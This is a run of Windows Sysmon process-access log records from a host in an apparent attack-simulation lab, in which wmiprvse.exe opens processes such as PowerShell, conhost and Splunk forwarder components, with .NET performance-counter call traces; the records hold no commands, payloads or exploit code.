21:43:48.565{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149832Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.565{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7078-60CA-040D-00000000D101}7080C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149831Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.564{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7078-60CA-040D-00000000D101}7080C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149830Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.563{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149829Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.563{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149828Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.562{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149827Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.562{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149826Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.562{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149825Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.562{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149824Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.562{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149823Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.562{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149822Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.562{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149821Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.561{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149820Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.561{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149819Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.561{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149818Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.560{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149817Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.560{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149816Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.560{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149815Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.560{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149814Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.560{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149813Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.560{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149812Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.560{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149811Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.560{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149810Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.559{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149809Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 